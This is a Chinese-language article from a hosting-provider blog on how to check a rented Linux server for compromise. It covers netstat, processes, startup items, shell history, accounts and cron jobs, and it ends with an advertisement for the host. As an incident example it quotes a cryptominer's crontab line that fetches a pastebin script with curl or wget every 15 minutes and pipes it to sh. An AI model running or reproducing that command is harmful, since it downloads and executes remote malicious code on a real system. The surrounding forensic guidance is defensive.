如果服务器租用主机被攻击我们该怎样快速排查？

　　服务器租用用户主机受到攻击时往往会有些异常情况，用户是否能快速找出问题并及时解决是减少损失的关键，那么服务器租用主机被攻击我们该怎样快速排查？

　　首先我们会对当前服务器的IP，以及IP的地址，linux服务器名称，服务器的版本是centos,还是redhat，服务器的当前时间，进行收集并记录到一个txt文档里，接下来再执行下一步，对当前服务器的异常网络连接以及异常的系统进程检查，主要是通过netstat -an以及-antp命令来检查服务器存在哪些异常的IP连接。并对连接的IP，进行归属地查询，如果是国外的IP，直接记录当前进程的PID值，并自动将PID的所有信息记录，查询PID所在的linux文件地址，紧接着检查当前占用CPU大于百分之30的进程，并检查该进程所在的文件夹。

　　在我们处理客户服务器被攻击的时候发现很多服务器的命令被篡改，比如正常的PS查看进程的，查询目录的 cd的命令都给篡改了，让服务器无法正常使用命令，检查服务器安全造成了困扰。对服务器的启动项进行检查，有些服务器被植入木马后门，即使重启服务器也还是被攻击，木马会自动的启动，检查linux的init.d的文件夹里是否有多余的启动文件，也可以检查时间，来判断启动项是否有问题。

　　再一个要检查的地方是服务器的历史命令，history很多服务器被黑都会留下痕迹，比如SSH登录服务器后，攻击者对服务器进行了操作，执行了那些恶意命令都可以通过history查询的到，有没有使用wget命令下载木马，或者执行SH文件。检查服务器的所有账号，以及当前使用并登录的管理员账户，tty是本地用户登录，pst是远程连接的用户登录，来排查服务器是否被黑，被攻击，也可以检查login.defs文件的uid值，判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户，包括特权账户，UID值为0.

　　最重要的是检查服务器的定时任务，前段时间某网站客户中了挖矿病毒，一直占用CPU，查看了定时任务发现每15分钟自动执行下载命令，crontab -l */15 * * * * （curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd）|sh 代码如上，自动下载并执行SH木马文件。定时任务删都删不掉，最后通过检查系统文件查到了木马，并终止进程，强制删除。有些服务器被黑后，请立即检查2天里被修改的文件，可以通过find命令去检查所有的文件，看是否有木马后门文件，如果有可以确定服务器被黑了。

　　以上就是服务器被入侵攻击的检查办法，通过我们SINE安全给出的检查步骤，挨个去检查，就会发现出问题，最重要的是要检查日志，对这些日志要仔细的检查，哪怕一个特征都会导致服务器陷入被黑，被攻击的状态，也希望我们的分享能够帮助到更多需要帮助的人，服务器安全了，带来的也是整个互联网的安全。

以上就是服务器租用主机被攻击的快速排查的方法，另外小编要说的事，为了我们服务器更加安全，我们可以选择南方联合这类比较有实力的服务商，南方联合有着13年的丰富IDC经验，专业提供服务器托管，服务器租用，主机托管，云服务器租用等服务，欢迎咨询客服了解详情。